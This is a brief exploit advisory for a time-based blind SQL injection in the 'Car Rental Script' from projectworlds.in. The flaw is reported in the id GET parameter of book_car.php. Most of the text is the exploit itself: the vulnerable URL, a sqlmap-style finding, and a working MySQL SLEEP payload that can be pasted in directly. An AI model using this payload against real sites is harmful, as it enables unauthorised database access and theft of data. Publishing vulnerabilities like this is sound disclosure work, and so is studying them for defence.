Car Rental Script from projectworlds.in suffers from a remote SQL injection vulnerability. Versions are not provided with this software currently.
2e01a55b635c9bfb17fe3f6b96de3983
====================================================================
Car Rental Script - Time-based blind SQL injection
====================================================================
####################################################################
.:. Author : Yussef Dajdaj
.:. Contact :
.:. Vendor : https://projectworlds.in/
.:. Script : https://projectworlds.in/free-projects/php-projects/car-rental-project-in-php-and-mysql/
.:. Date: : 8/8/2020
.:. Tested on: : Tested on: Window 10 64 bit environment || XAMPP
####################################################################
===[ Exploit ]===
[*] SQL injection
=================================
https://localhost/testing/book_car.php?id='[payload<https://localhost/testing/book_car.php?id='%5bpayload>]
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=' AND (SELECT 4182 FROM (SELECT(SLEEP(5)))dQXQ) AND 'CYlu'='CYlu
the back-end DBMS is MySQL, web application technology: PHP 7.2.32, PHP, Apache 2.4.43